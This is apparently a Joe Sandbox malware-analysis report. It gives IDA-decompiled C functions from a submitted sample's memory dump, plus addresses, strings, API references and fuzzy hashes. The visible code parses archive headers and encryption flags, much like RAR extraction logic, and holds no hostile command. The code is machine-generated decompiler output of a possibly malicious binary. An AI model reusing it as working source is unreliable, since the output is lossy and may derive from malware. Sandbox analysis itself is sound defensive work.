							E00B615FB(_t548 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
							return  *(_t548 + 0x64);
						}
						__eflags = _t536;
						if(_t536 == 0) {
							goto L88;
						}
						_t46 = _t536 + 4; // 0x4
						_t47 = _t536 - 3; // -3
						_t514 = _t46 + _t240;
						_t414 = _t47 + _t240;
						__eflags = _t414;
						if(_t414 < 0) {
							goto L88;
						}
						__eflags = _t514 - 7;
						if(_t514 < 7) {
							goto L88;
						}
						_push(_t414);
						E00B6CD8A();
						__eflags =  *(_t548 + 0x48) - _t514;
						if( *(_t548 + 0x48) < _t514) {
							goto L20;
						}
						_t246 = E00B6CCDB(_t548 + 0x30);
						 *(_t399 + 0x2200) = E00B6CCFB();
						_t248 = E00B6CCFB();
						 *(_t399 + 0x2204) = _t248;
						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
						_t515 = _t399 + 0x21fc;
						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
						__eflags =  *_t515 - _t246;
						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
						_t60 = _t548 + 0x6b;
						 *_t60 =  *_t515 != _t246;
						__eflags =  *_t60;
						if( *_t60 == 0) {
							L29:
							_t252 = 0;
							__eflags =  *(_t399 + 0x2204) & 0x00000001;
							 *(_t548 + 0x58) = 0;
							 *(_t548 + 0x54) = 0;
							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
								L33:
								__eflags =  *(_t399 + 0x2204) & 0x00000002;
								_t539 = _t252;
								 *(_t548 + 0x60) = _t252;
								 *(_t548 + 0x5c) = _t252;
								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
									_t363 = E00B6CCFB();
									_t539 = _t363;
									 *(_t548 + 0x60) = _t363;
									 *(_t548 + 0x5c) = _t500;
								}
								_t253 = E00B61983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
								asm("adc ecx, edx");
								 *((intOrPtr*)(_t399 + 0x6cc0)) = E00B63EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
								_t502 =  *(_t399 + 0x2200);
								_t257 = _t502 - 1;
								__eflags = _t257;
								if(_t257 == 0) {
									E00B6AD5E(_t399 + 0x2220);
									_t423 = 5;
									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
									_t503 = E00B6CCFB();
									 *(_t399 + 0x6ccd) = _t503 & 1;
									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
									_t432 = 1;
									 *((char*)(_t399 + 0x6cd2)) = 1;
									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
									_t269 = 0;
									 *((char*)(_t399 + 0x6cd0)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										_t504 = 0;
									} else {
										_t504 = E00B6CCFB();
										_t269 = 0;
										_t432 = 1;
									}
									 *(_t399 + 0x6cf0) = _t504;
									__eflags =  *(_t399 + 0x6ccd);
									if( *(_t399 + 0x6ccd) == 0) {
										L84:
										_t432 = _t269;
										goto L85;
									} else {
										__eflags = _t504;
										if(_t504 == 0) {
											L85:
											 *((char*)(_t399 + 0x6cd1)) = _t432;
											_t433 =  *(_t548 + 0x58);
											__eflags = _t433 |  *(_t548 + 0x54);
											if((_t433 |  *(_t548 + 0x54)) != 0) {
												E00B62210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
											}
											goto L87;
										}
										goto L84;
									}
								} else {
									_t277 = _t257 - 1;
									__eflags = _t277;
									if(_t277 == 0) {
										L49:
										__eflags = _t502 - 2;
										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
										 *(_t548 + 0x2c) = _t522;
										E00B6ACC4(_t522, 0);
										_t438 = 5;
										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
										_t542 =  *(_t548 + 0x2c);
										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
										 *((char*)(_t542 + 0x10f9)) = 1;
										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
										 *(_t542 + 0x1094) = E00B6CCFB();
										 *(_t542 + 0x1060) = E00B6CCFB();
										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
										__eflags = _t289;
										 *(_t542 + 0x1064) = _t502;
										 *(_t542 + 0x109a) = _t289;
										if(_t289 != 0) {
											 *(_t542 + 0x1060) = 0x7fffffff;
											 *(_t542 + 0x1064) = 0x7fffffff;
										}
										_t442 =  *(_t542 + 0x105c);
										_t525 =  *(_t542 + 0x1064);
										_t290 =  *(_t542 + 0x1058);
										_t505 =  *(_t542 + 0x1060);
										__eflags = _t442 - _t525;
										if(__eflags < 0) {
											L54:
											_t290 = _t505;
											_t442 = _t525;
											goto L55;
										} else {
											if(__eflags > 0) {
												L55:
												 *(_t542 + 0x106c) = _t442;
												 *(_t542 + 0x1068) = _t290;
												_t291 = E00B6CCFB();
												__eflags =  *(_t542 + 0x1094) & 0x00000002;
												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
													E00B7158F(_t542 + 0x1040, E00B6CBFB(_t548 + 0x30), 0);
												}
												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
												__eflags =  *(_t542 + 0x1094) & 0x00000004;
												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
													 *(_t542 + 0x1070) = 2;
													 *((intOrPtr*)(_t542 + 0x1074)) = E00B6CBFB(_t548 + 0x30);
												}
												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
												_t292 = E00B6CCFB();
												 *(_t548 + 0x60) = _t292;
												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
												_t450 = (_t292 & 0x0000003f) + 0x32;
												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
												__eflags = _t450 - 0x32;
												if(_t450 != 0x32) {
													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
												}
												 *((char*)(_t542 + 0x18)) = E00B6CCFB();
												_t526 = E00B6CCFB();
												 *(_t542 + 0x10fc) = 2;
												_t295 =  *((intOrPtr*)(_t542 + 0x18));
												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295;
													if(_t295 == 0) {
														_t178 = _t542 + 0x10fc;
														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
														__eflags =  *_t178;
													}
												} else {
													 *(_t542 + 0x10fc) = 1;
												}
												_t456 =  *(_t542 + 8);
												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
												__eflags =  *(_t548 + 0x64) - 2;
												_t459 =  *(_t548 + 0x60);
												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
												if( *(_t548 + 0x64) != 2) {
													L68:
													_t302 = 0;
													__eflags = 0;
													goto L69;
												} else {
													__eflags = _t459 & 0x00000040;
													if((_t459 & 0x00000040) == 0) {
														goto L68;
													}
													_t302 = 1;
													L69:
													 *((char*)(_t542 + 0x10f0)) = _t302;
													_t304 =  *(_t542 + 0x1094) & 1;
													 *(_t542 + 0x10f1) = _t304;
													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
													__eflags = _t526 - 0x1fff;
													if(_t526 >= 0x1fff) {
														_t526 = 0x1fff;
													}
													E00B6CC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
													_push(0x800);
													_t527 = _t542 + 0x28;
													_push(_t542 + 0x28);
													_push(_t548 - 0x2074);
													E00B71C3B();
													_t463 =  *(_t548 + 0x58);
													_t318 = _t463 |  *(_t548 + 0x54);
													__eflags = _t463 |  *(_t548 + 0x54);
													if((_t463 |  *(_t548 + 0x54)) != 0) {
														_t318 = E00B62210(_t399, _t509, _t548 + 0x30, _t463, _t542);
													}
													__eflags =  *(_t548 + 0x64) - 2;
													if( *(_t548 + 0x64) != 2) {
														_t319 = E00B83E49(_t318, _t527, L"CMT");
														__eflags = _t319;
														if(_t319 == 0) {
															 *((char*)(_t399 + 0x6cce)) = 1;
														}
													} else {
														E00B62134(_t399, _t542);
													}
													__eflags =  *(_t548 + 0x6b);
													if(__eflags != 0) {
														E00B62021(__eflags, 0x1c, _t399 + 0x32, _t527);
													}
													L87:
													 *(_t548 + 0x64) =  *(_t548 + 0x48);
													goto L89;
												}
											}
											__eflags = _t290 - _t505;
											if(_t290 > _t505) {
												goto L55;
											}
											goto L54;
										}
									}
									_t328 = _t277 - 1;
									__eflags = _t328;
									if(_t328 == 0) {
										goto L49;
									}
									_t329 = _t328 - 1;
									__eflags = _t329;
									if(_t329 == 0) {
										_t471 = 5;
										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
										_t331 = E00B6CCFB();
										__eflags = _t331;
										if(_t331 == 0) {
											 *(_t399 + 0x2274) = E00B6CCFB() & 0x00000001;
											_t335 = E00B6CBAF(_t548 + 0x30) & 0x000000ff;
											 *(_t399 + 0x2278) = _t335;
											__eflags = _t335 - 0x18;
											if(_t335 <= 0x18) {
												E00B6CC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
												__eflags =  *(_t399 + 0x2274);
												if( *(_t399 + 0x2274) != 0) {
													_t544 = _t399 + 0x228c;
													E00B6CC5D(_t548 + 0x30, _t544, 8);
													E00B6CC5D(_t548 + 0x30, _t548 + 0x64, 4);
													E00B70016(_t548 - 0x74);
													_push(8);
													_push(_t544);
													_push(_t548 - 0x74);
													E00B7005C();
													_push(_t548 + 8);
													E00B6FF33(_t548 - 0x74);
													_t350 = E00B80C4A(_t548 + 0x64, _t548 + 8, 4);
													asm("sbb al, al");
													_t352 =  ~_t350 + 1;
													__eflags = _t352;
													 *(_t399 + 0x2274) = _t352;
												}
												 *((char*)(_t399 + 0x6cd4)) = 1;
												goto L87;
											}
											_push(_t335);
											_push(L"hc%u");
											L43:
											_push(0x14);
											_push(_t548);
											E00B64092();
											E00B6403D(_t399, _t399 + 0x32, _t548);
											goto L89;
										}
										_push(_t331);
										_push(L"h%u");
										goto L43;
									}
									__eflags = _t329 == 1;
									if(_t329 == 1) {
										_t480 = 5;
										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
										 *(_t399 + 0x45c4) = E00B6CCFB() & 0x00000001;
										 *((short*)(_t399 + 0x45c6)) = 0;
										 *((char*)(_t399 + 0x45c5)) = 0;
									}
									goto L87;
								}
							}
							_t485 = E00B6CCFB();
							 *(_t548 + 0x54) = _t500;
							_t252 = 0;
							 *(_t548 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L33;
							}
							if(__eflags > 0) {
								goto L88;
							}
							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
								goto L88;
							}
							goto L33;
						}
						E00B620D7(_t399);
						 *((char*)(_t399 + 0x6cdc)) = 1;
						E00B66D83(0xba1098, 3);
						__eflags =  *((char*)(_t548 + 0x6a));
						if(__eflags == 0) {
							goto L29;
						} else {
							E00B62021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
							L6:
							 *((char*)(_t399 + 0x6cdd)) = 1;
							goto L89;
						}
					}
					L20:
					E00B63FFC(_t399, _t500);
					goto L89;
				}
				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
				asm("adc eax, ecx");
				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
					goto L18;
				} else {
					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
					 *((char*)(_t548 + 0x6a)) = 1;
					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
						 *0xb93278(_t548 + 0x18, 0x10);
						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
						__eflags = _t373 - 0x10;
						if(_t373 != 0x10) {
							goto L20;
						}
						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
						__eflags =  *((char*)(_t374 + 0x6124));
						if( *((char*)(_t374 + 0x6124)) != 0) {
							L10:
							 *(_t548 + 0x6b) = 1;
							L11:
							E00B63E6D(_t399);
							_t534 = _t399 + 0x227c;
							_t547 = _t399 + 0x1038;
							E00B6603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
							__eflags =  *(_t399 + 0x2274);
							if( *(_t399 + 0x2274) == 0) {
								L16:
								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
								goto L19;
							} else {
								_t381 = _t399 + 0x228c;
								while(1) {
									_t383 = E00B80C4A(_t548 + 0x28, _t381, 8);
									_t551 = _t551 + 0xc;
									__eflags = _t383;
									if(_t383 == 0) {
										goto L16;
									}
									__eflags =  *(_t548 + 0x6b);
									_t384 = _t399 + 0x32;
									_push(_t384);
									_push(_t384);
									if(__eflags != 0) {
										_push(6);
										E00B62021(__eflags);
										 *((char*)(_t399 + 0x6cdd)) = 1;
										E00B66D83(0xba1098, 0xb);
										goto L89;
									}
									_push(0x83);
									E00B62021(__eflags);
									E00B6F279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
									E00B63E6D(_t399);
									E00B6603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
									__eflags =  *(_t399 + 0x2274);
									_t381 = _t399 + 0x228c;
									if( *(_t399 + 0x2274) != 0) {
										continue;
									}
									goto L16;
								}
								goto L16;
							}
						}
						_t395 = E00B71B63();
						 *(_t548 + 0x6b) = 0;
						__eflags = _t395;
						if(_t395 == 0) {
							goto L11;
						}
						goto L10;
					} else {
						E00B6138B(_t563, 0x7f, _t399 + 0x32);
						goto L6;
					}
				}
			}

0x00b632f8
0x00b63300
0x00b6330a
0x00b63311
0x00b63318
0x00b6331f
0x00b63322
0x00b6332b
0x00b634a6
0x00b634a6
0x00b634a9
0x00b634a9
0x00b634ae
0x00b634b3
0x00b634b6
0x00b634c7
0x00b634d8
0x00b634e6
0x00b634e8
0x00b634ef
0x00b634f1
0x00b63b09
0x00b63b0b
0x00b63b10
0x00b63b13
0x00b63b21
0x00b63b2c
0x00b63b2c
0x00b634f7
0x00b634f9
0x00000000
0x00000000
0x00b634ff
0x00b63502
0x00b63505
0x00b63507
0x00b63507
0x00b63509
0x00000000
0x00000000
0x00b6350f
0x00b63512
0x00000000
0x00000000
0x00b63518
0x00b6351c
0x00b63521
0x00b63524
0x00000000
0x00000000
0x00b63529
0x00b6353b
0x00b63541
0x00b63546
0x00b63551
0x00b63557
0x00b6355d
0x00b63563
0x00b6356b
0x00b63571
0x00b63571
0x00b63571
0x00b63575
0x00b635a8
0x00b635a8
0x00b635aa
0x00b635b1
0x00b635b4
0x00b635b7
0x00b635e1
0x00b635e1
0x00b635e8
0x00b635ea
0x00b635ed
0x00b635f0
0x00b635f5
0x00b635fa
0x00b635fc
0x00b635ff
0x00b635ff
0x00b6360a
0x00b63622
0x00b6362c
0x00b63632
0x00b63638
0x00b63640
0x00b63640
0x00b63643
0x00b63a50
0x00b63a5f
0x00b63a60
0x00b63a6a
0x00b63a73
0x00b63a85
0x00b63a8d
0x00b63a90
0x00b63a96
0x00b63aa3
0x00b63aa9
0x00b63aab
0x00b63ab1
0x00b63ab4
0x00b63ac7
0x00b63ab6
0x00b63abe
0x00b63ac2
0x00b63ac4
0x00b63ac4
0x00b63ac9
0x00b63acf
0x00b63ad6
0x00b63adc
0x00b63adc
0x00000000
0x00b63ad8
0x00b63ad8
0x00b63ada
0x00b63ade
0x00b63ade
0x00b63ae4
0x00b63ae9
0x00b63aec
0x00b63afc
0x00b63afc
0x00000000
0x00b63aec
0x00000000
0x00b63ada
0x00b63649
0x00b63649
0x00b63649
0x00b6364c
0x00b63796
0x00b63798
0x00b637a0
0x00b637af
0x00b637b3
0x00b637b6
0x00b637bd
0x00b637c4
0x00b637cf
0x00b637d2
0x00b637d8
0x00b637e1
0x00b637e8
0x00b637f6
0x00b63801
0x00b63810
0x00b63810
0x00b63812
0x00b63818
0x00b6381e
0x00b63825
0x00b6382b
0x00b6382b
0x00b63831
0x00b63837
0x00b6383d
0x00b63843
0x00b63849
0x00b6384b
0x00b63853
0x00b63853
0x00b63855
0x00000000
0x00b6384d
0x00b6384d
0x00b63857
0x00b63857
0x00b63860
0x00b63866
0x00b6386b
0x00b63872
0x00b63875
0x00b63888
0x00b63888
0x00b6388d
0x00b63894
0x00b6389b
0x00b638a0
0x00b638af
0x00b638af
0x00b638b5
0x00b638bf
0x00b638c6
0x00b638cf
0x00b638d7
0x00b638da
0x00b638dd
0x00b638e0
0x00b638e2
0x00b638e2
0x00b638f4
0x00b63908
0x00b6390a
0x00b63914
0x00b63919
0x00b6391f
0x00b63921
0x00b6392b
0x00b6392d
0x00b6392f
0x00b6392f
0x00b6392f
0x00b6392f
0x00b63923
0x00b63923
0x00b63923
0x00b63936
0x00b63940
0x00b63952
0x00b63958
0x00b6395c
0x00b6395f
0x00b63965
0x00b63970
0x00b63970
0x00b63970
0x00000000
0x00b63967
0x00b63967
0x00b6396a
0x00000000
0x00000000
0x00b6396c
0x00b63972
0x00b63972
0x00b6397e
0x00b63983
0x00b63994
0x00b63998
0x00b6399e
0x00b639ad
0x00b639b2
0x00b639bd
0x00b639bf
0x00b639c1
0x00b639c1
0x00b639ce
0x00b639d3
0x00b639e1
0x00b639e6
0x00b639e9
0x00b639ea
0x00b639eb
0x00b639f0
0x00b639f5
0x00b639f5
0x00b639f8
0x00b63a02
0x00b63a02
0x00b63a07
0x00b63a0b
0x00b63a1d
0x00b63a24
0x00b63a26
0x00b63a28
0x00b63a28
0x00b63a0d
0x00b63a10
0x00b63a10
0x00b63a2f
0x00b63a33
0x00b63a40
0x00b63a40
0x00b63b01
0x00b63b04
0x00000000
0x00b63b04
0x00b63965
0x00b6384f
0x00b63851
0x00000000
0x00000000
0x00000000
0x00b63851
0x00b6384b
0x00b63652
0x00b63652
0x00b63655
0x00000000
0x00000000
0x00b6365b
0x00b6365b
0x00b6365e
0x00b636a0
0x00b636ad
0x00b636b2
0x00b636b7
0x00b636b9
0x00b636f0
0x00b636fb
0x00b636fe
0x00b63704
0x00b63707
0x00b6371d
0x00b63722
0x00b63729
0x00b6372d
0x00b63737
0x00b63745
0x00b6374e
0x00b63753
0x00b63755
0x00b63759
0x00b6375a
0x00b63762
0x00b63767
0x00b63776
0x00b63780
0x00b63782
0x00b63782
0x00b63784
0x00b63784
0x00b6378a
0x00000000
0x00b6378a
0x00b63709
0x00b6370a
0x00b636c1
0x00b636c4
0x00b636c6
0x00b636c7
0x00b636d9
0x00000000
0x00b636d9
0x00b636bb
0x00b636bc
0x00000000
0x00b636bc
0x00b63660
0x00b63663
0x00b6366b
0x00b63678
0x00b63684
0x00b6368c
0x00b63693
0x00b63693
0x00000000
0x00b63663
0x00b63643
0x00b635c1
0x00b635c3
0x00b635c6
0x00b635c8
0x00b635cb
0x00b635cd
0x00000000
0x00000000
0x00b635cf
0x00000000
0x00000000
0x00b635d5
0x00b635db
0x00000000
0x00000000
0x00000000
0x00b635db
0x00b63579
0x00b63585
0x00b6358c
0x00b63591
0x00b63595
0x00000000
0x00b63597
0x00b6359e
0x00b63375
0x00b63375
0x00000000
0x00b63375
0x00b63595
0x00b634b8
0x00b634ba
0x00000000
0x00b634ba
0x00b63339
0x00b6333c
0x00b6333e
0x00b63344
0x00000000
0x00b63358
0x00b63358
0x00b6335e
0x00b63362
0x00b63368
0x00b6338e
0x00b63396
0x00b63398
0x00b6339b
0x00000000
0x00000000
0x00b633a1
0x00b633a7
0x00b633ae
0x00b633bd
0x00b633bd
0x00b633c1
0x00b633c3
0x00b633df
0x00b633eb
0x00b633f7
0x00b633fc
0x00b63403
0x00b63482
0x00b63482
0x00000000
0x00b63405
0x00b63405
0x00b6340b
0x00b63412
0x00b63417
0x00b6341a
0x00b6341c
0x00000000
0x00000000
0x00b6341e
0x00b63422
0x00b63425
0x00b63426
0x00b63427
0x00b63487
0x00b63489
0x00b63495
0x00b6349c
0x00000000
0x00b6349c
0x00b63429
0x00b6342e
0x00b6343f
0x00b63446
0x00b6346e
0x00b63473
0x00b6347a
0x00b63480
0x00000000
0x00000000
0x00000000
0x00b63480
0x00000000
0x00b6340b
0x00b63403
0x00b633b0
0x00b633b5
0x00b633b9
0x00b633bb
0x00000000
0x00000000
0x00000000
0x00b6336a
0x00b63370
0x00000000
0x00b63370
0x00b63368

APIs

__EH_prolog.LIBCMT ref: 00B63300
_swprintf.LIBCMT ref: 00B636C7

Strings

CMT, xrefs: 00B63A17
hc%u, xrefs: 00B6370A
h%u, xrefs: 00B636BC

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: af8269c79afbef94ac7950eb003d09e75ae1106f823574a1166e2c52382e0974
Instruction ID: b01073e66512fcf349701ef5fe6bbe79300610cd959a8f23932ed58a20913323
Opcode Fuzzy Hash: af8269c79afbef94ac7950eb003d09e75ae1106f823574a1166e2c52382e0974
Instruction Fuzzy Hash: 4532C271514284AFDF14DF74C895AEA3BE5EF15700F0844BDFD8A8B282DB789A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B6286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00B6286B(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t329;
				signed int _t334;
				void* _t335;
				void* _t337;
				signed int _t340;
				char _t354;
				signed short _t361;
				signed int _t364;
				signed int _t371;
				signed char _t374;
				signed char _t377;
				signed int _t378;
				signed int _t395;
				signed int _t396;
				signed int _t400;
				signed char _t413;
				intOrPtr _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed short _t437;
				signed short _t442;
				unsigned int _t447;
				signed int _t450;
				signed int _t455;
				signed int _t469;
				void* _t470;
				void* _t478;
				signed char _t484;
				signed int _t488;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr* _t516;
				signed int _t520;
				signed int _t521;
				signed int _t533;
				signed int _t537;
				signed int _t539;
				unsigned int _t548;
				signed int _t550;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				intOrPtr* _t585;
				void* _t593;
				signed int _t597;
				intOrPtr _t609;
				signed int _t612;
				signed int _t624;
				signed char _t628;
				void* _t639;
				signed char _t640;
				signed int _t643;
				unsigned int _t644;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t653;
				signed int _t657;
				void* _t659;
				void* _t665;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				void* _t673;
				signed int _t675;
				intOrPtr* _t676;
				signed int _t688;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				intOrPtr _t707;
				intOrPtr* _t708;
				intOrPtr _t718;

				E00B7EB78(0xb926a5, _t708);
				E00B7EC50(0x2024);
				_t516 = __ecx;
				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
				E00B6CB83(_t708 + 0x1c, __ecx);
				 *(_t708 + 0x10) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t657 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L7:
					 *((char*)(_t708 + 0x5a)) = 0;
					L8:
					_push(_t657);
					E00B6CD8A();
					__eflags =  *(_t708 + 0x34);
					if( *(_t708 + 0x34) == 0) {
						L5:
						E00B63FFC(_t516, _t639);
						L131:
						E00B615FB(_t708 + 0x1c);
						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
						return  *(_t708 + 0x10);
					}
					 *(_t516 + 0x21fc) = E00B6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x220c) = 0;
					_t688 = E00B6CBAF(_t708 + 0x1c) & 0x000000ff;
					_t329 = E00B6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2204) = _t329;
					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
					_t533 = E00B6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2208) = _t533;
					 *(_t516 + 0x2200) = _t688;
					__eflags = _t533 - _t657;
					if(_t533 >= _t657) {
						_t640 = 2;
						_t334 = _t688 - 0x73;
						__eflags = _t334;
						if(_t334 == 0) {
							 *(_t516 + 0x2200) = 1;
							_t688 = 1;
							__eflags = 1;
							L20:
							 *(_t516 + 0x21f4) = _t688;
							__eflags = _t688 - 0x75;
							if(_t688 == 0x75) {
								L23:
								_t335 = 6;
								L25:
								_push(_t335);
								E00B6CD8A();
								_t337 = E00B61983(_t516,  *(_t516 + 0x2208));
								asm("adc ecx, 0x0");
								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
								_t537 =  *(_t516 + 0x2200);
								 *(_t708 + 0x18) = _t537;
								_t340 = _t537 - 1;
								__eflags = _t340;
								if(_t340 == 0) {
									_t659 = _t516 + 0x2220;
									E00B6AD5E(_t659);
									_t539 = 5;
									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
									 *(_t516 + 0x2234) = E00B6CBC6(_t708 + 0x1c);
									_t640 = E00B6CBFB(_t708 + 0x1c);
									 *(_t516 + 0x2238) = _t640;
									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
									_t548 =  *(_t516 + 0x2228);
									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
									__eflags = _t640;
									if(_t640 != 0) {
										L117:
										_t354 = 1;
										L118:
										 *((char*)(_t516 + 0x6cd0)) = _t354;
										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
										_t550 = _t548 >> 0x00000004 & 0x00000001;
										__eflags = _t550;
										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
										 *(_t516 + 0x6cd2) = _t550;
										L119:
										_t657 = 7;
										L120:
										_t361 = E00B6CCAC(_t708 + 0x1c, 0);
										__eflags =  *(_t516 + 0x21fc) - (_t361 & 0x0000ffff);
										if( *(_t516 + 0x21fc) == (_t361 & 0x0000ffff)) {
											L130:
											 *(_t708 + 0x10) =  *(_t708 + 0x34);
											goto L131;
										}
										_t364 =  *(_t516 + 0x2200);
										__eflags = _t364 - 0x79;
										if(_t364 == 0x79) {
											goto L130;
										}
										__eflags = _t364 - 0x76;
										if(_t364 == 0x76) {
											goto L130;
										}
										__eflags = _t364 - 5;
										if(_t364 != 5) {
											L128:
											 *((char*)(_t516 + 0x6cdc)) = 1;
											E00B66D83(0xba1098, 3);
											__eflags =  *((char*)(_t708 + 0x5a));
											if(__eflags == 0) {
												goto L130;
											}
											E00B62021(__eflags, 4, _t516 + 0x32, _t516 + 0x32);
											 *((char*)(_t516 + 0x6cdd)) = 1;
											goto L131;
										}
										__eflags =  *(_t516 + 0x45c6);
										if( *(_t516 + 0x45c6) == 0) {
											goto L128;
										}
										 *0xb93278();
										_t371 =  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))() - _t657;
										__eflags = _t371;
										asm("sbb edx, ecx");
										 *0xb93278(_t371, _t640, 0);
										 *((intOrPtr*)( *_t516 + 0x10))();
										 *(_t708 + 0x5b) = 1;
										do {
											_t374 = E00B69892(_t516);
											asm("sbb al, al");
